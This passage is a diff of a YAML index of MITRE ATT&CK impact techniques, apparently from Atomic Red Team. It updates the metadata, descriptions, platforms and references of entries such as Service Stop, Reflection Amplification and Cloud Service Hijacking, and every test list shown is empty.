     atomic_tests: []
   T1565.001:
     technique:
+      modified: '2024-08-26T16:33:33.982Z'
+      name: Stored Data Manipulation
+      description: |-
+        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: Where applicable, inspect important file hashes, locations,
+        and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      - 'File: File Creation'
+      - 'File: File Deletion'
+      x_mitre_impact_type:
+      - Integrity
       type: attack-pattern
       id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
       created: '2020-03-02T14:22:24.410Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.001
         url: https://attack.mitre.org/techniques/T1565/001
+        external_id: T1565.001
       - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
         description: Department of Justice. (2018, September 6). Criminal Complaint
           - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
       - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
         description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
           November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
-        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Stored Data Manipulation
-      x_mitre_detection: Where applicable, inspect important file hashes, locations,
-        and modifications for suspicious/unexpected values.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'File: File Modification'
-      - 'File: File Creation'
-      - 'File: File Deletion'
-      x_mitre_impact_type:
-      - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1489:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
-      created: '2019-03-29T19:00:55.901Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1489
-        url: https://attack.mitre.org/techniques/T1489
-      - source_name: SecureWorks WannaCry Analysis
-        url: https://www.secureworks.com/research/wcry-ransomware-analysis
-        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
-          Analysis. Retrieved March 26, 2019.
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Novetta Blockbuster
-        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
-        description: 'Novetta Threat Research Group. (2016, February 24). Operation
-          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
-          25, 2016.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-12T15:57:27.380Z'
+      name: Service Stop
       description: "Adversaries may stop or disable services on a system to render
         those services unavailable to legitimate users. Stopping critical services
         or processes can inhibit or stop response to an incident or aid in the adversary's
         overall objectives to cause damage to the environment.(Citation: Talos Olympic
         Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
         this by disabling individual services of high importance to an organization,
-        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible
-        (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
-        many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.(Citation:
+        Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+        all services to render systems unusable.(Citation: Talos Olympic Destroyer
         2018) Services or processes may not allow for modification of their data stores
         while running. Adversaries may stop services or processes in order to conduct
         [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
         for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
         of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Service Stop
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
 
@@ -63656,10 +64411,14 @@ impact:
         Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
 
         Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, <code>ChangeServiceConfigW</code> may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Process: Process Termination'
@@ -63670,39 +64429,37 @@ impact:
       - 'Service: Service Metadata'
       x_mitre_impact_type:
       - Availability
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+      created: '2019-03-29T19:00:55.901Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1489
+        external_id: T1489
+      - source_name: SecureWorks WannaCry Analysis
+        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+          Analysis. Retrieved March 26, 2019.
+        url: https://www.secureworks.com/research/wcry-ransomware-analysis
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Novetta Blockbuster
+        description: 'Novetta Threat Research Group. (2016, February 24). Operation
+          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+          25, 2016.'
+        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1489
     atomic_tests: []
   T1499.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
-      type: attack-pattern
-      created: '2020-02-20T15:37:27.052Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1499.004
-        url: https://attack.mitre.org/techniques/T1499/004
-      - source_name: Sucuri BIND9 August 2015
-        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
-        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
-          in the Wild. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T15:42:23.001Z'
       name: Application or System Exploitation
       description: "Adversaries may exploit software vulnerabilities that can cause
         an application or system to crash and deny availability to users. (Citation:
@@ -63720,13 +64477,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Attacks targeting web applications may generate logs in the
         web server, application server, and/or database server that can be used to
         identify the type of attack. Externally monitor the availability of services
         that may be targeted by an Endpoint DoS.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -63734,36 +64498,27 @@ impact:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1565.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
       type: attack-pattern
-      created: '2020-03-02T14:30:05.252Z'
+      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+      created: '2020-02-20T15:37:27.052Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.003
-        url: https://attack.mitre.org/techniques/T1565/003
-      - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-        url: https://content.fireeye.com/apt/rpt-apt38
-        source_name: FireEye APT38 Oct 2018
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1499/004
+        external_id: T1499.004
+      - source_name: Sucuri BIND9 August 2015
+        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+          in the Wild. Retrieved April 26, 2019.
+        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1565.003:
+    technique:
+      modified: '2024-10-15T18:21:43.760Z'
       name: Runtime Data Manipulation
       description: |-
         Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -63772,11 +64527,17 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Inspect important application binary file hashes, locations,
         and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'File: File Deletion'
@@ -63785,17 +64546,31 @@ impact:
       - 'File: File Creation'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - root
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+      created: '2020-03-02T14:30:05.252Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/003
+        external_id: T1565.003
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1498.002:
     technique:
-      modified: '2023-03-30T21:01:41.052Z'
+      modified: '2024-10-15T16:04:34.495Z'
       name: Reflection Amplification
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
@@ -63804,6 +64579,7 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
         before the traffic volume is sufficient to cause impact to the availability
         of the service, but such response time typically requires very aggressive
@@ -63819,17 +64595,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Sensor Health: Host Status'
       - 'Network Traffic: Network Traffic Flow'
@@ -63839,14 +64610,15 @@ impact:
       id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
       created: '2020-03-02T20:08:03.691Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1498/002
         external_id: T1498.002
-      - source_name: Cloudflare ReflectionDoS May 2017
-        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
-          (attacks). Retrieved April 23, 2019.
-        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       - source_name: Cloudflare DNSamplficationDoS
         description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
           April 23, 2019.
@@ -63855,28 +64627,28 @@ impact:
         description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
           April 23, 2019.
         url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+      - source_name: Cloudflare ReflectionDoS May 2017
+        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+          (attacks). Retrieved April 23, 2019.
+        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cloudflare Memcrashed Feb 2018
+        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
       - source_name: Arbor AnnualDoSreport Jan 2018
         description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
           Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
           into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
           Infrastructure Security Report. Retrieved April 22, 2019.
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-      - source_name: Cloudflare Memcrashed Feb 2018
-        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
-          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
-        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
-      - source_name: Cisco DoSdetectNetflow
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1499.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:05:48.014Z'
       name: Service Exhaustion Flood
       description: |-
         Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -63887,7 +64659,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -63898,17 +64669,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -63945,7 +64711,8 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491:
     technique:
@@ -63966,7 +64733,7 @@ impact:
       - source_name: mitre-attack
         external_id: T1491
         url: https://attack.mitre.org/techniques/T1491
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:42.056Z'
       name: Defacement
       description: "Adversaries may modify visual content available internally or
         externally to an enterprise network, thus affecting the integrity of the original
@@ -63993,12 +64760,78 @@ impact:
       x_mitre_impact_type:
       - Integrity
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+    atomic_tests: []
+  T1496.002:
+    technique:
+      modified: '2024-09-25T14:59:35.287Z'
+      name: Bandwidth Hijacking
+      description: "Adversaries may leverage the network bandwidth resources of co-opted
+        systems to complete resource-intensive tasks, which may impact system and/or
+        hosted service availability. \n\nAdversaries may also use malware that leverages
+        a system's network bandwidth as part of a botnet in order to facilitate [Network
+        Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+        to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+        in proxyjacking by selling use of the victims' network bandwidth and IP address
+        to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+        in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+        Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+        financial costs or availability disruptions, this technique may cause reputational
+        damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+        Proxyjacking)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      - IaaS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'File: File Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Connection Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+      created: '2024-09-25T13:44:35.412Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/002
+        external_id: T1496.002
+      - source_name: Sysdig Proxyjacking
+        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+          Chat. Retrieved July 6, 2023.
+        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+      - source_name: Unit 42 Leaked Environment Variables 2024
+        description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+          Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+          Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+        url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+      - source_name: GoBotKR
+        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1657:
     technique:
-      modified: '2024-04-11T20:22:14.359Z'
+      modified: '2024-10-15T15:58:10.254Z'
       name: Financial Theft
       description: "Adversaries may steal monetary resources from targets through
         extortion, social engineering, technical theft, or other methods aimed at
@@ -64031,7 +64864,7 @@ impact:
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
       - Pawel Partyka, Microsoft Threat Intelligence
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -64041,10 +64874,9 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
@@ -64107,7 +64939,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1491.001:
     technique:
@@ -64148,7 +64979,7 @@ impact:
         messages. Since internally defacing systems exposes an adversary''s presence,
         it often takes place after other intrusion goals have been accomplished.(Citation:
         Novetta Blockbuster Destructive Malware)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-28T18:55:35.988Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Defacement: Internal Defacement'
       x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -64169,9 +65000,157 @@ impact:
       - Integrity
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1491.001
     atomic_tests: []
+  T1496.004:
+    technique:
+      modified: '2024-10-16T17:59:27.535Z'
+      name: Cloud Service Hijacking
+      description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+        applications to complete resource-intensive tasks, which may impact hosted
+        service availability. \n\nFor example, adversaries may leverage email and
+        messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+        Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+        spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+        messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+        2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+        in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+        AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+        2024)\n\nIn some cases, adversaries may leverage services that the victim
+        is already using. In others, particularly when the service is part of a larger
+        cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+        2024) Leveraging SaaS applications may cause the victim to incur significant
+        financial costs, use up service quotas, and otherwise impact availability. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+      created: '2024-09-25T14:05:59.910Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/004
+        external_id: T1496.004
+      - source_name: SentinelLabs SNS Sender 2024
+        description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+          Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+        url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+      - source_name: Lacework LLMJacking 2024
+        description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+          with Composite Alerts. Retrieved September 25, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+      - source_name: Sysdig LLMJacking 2024
+        description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+          (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+      - source_name: Permiso SES Abuse 2023
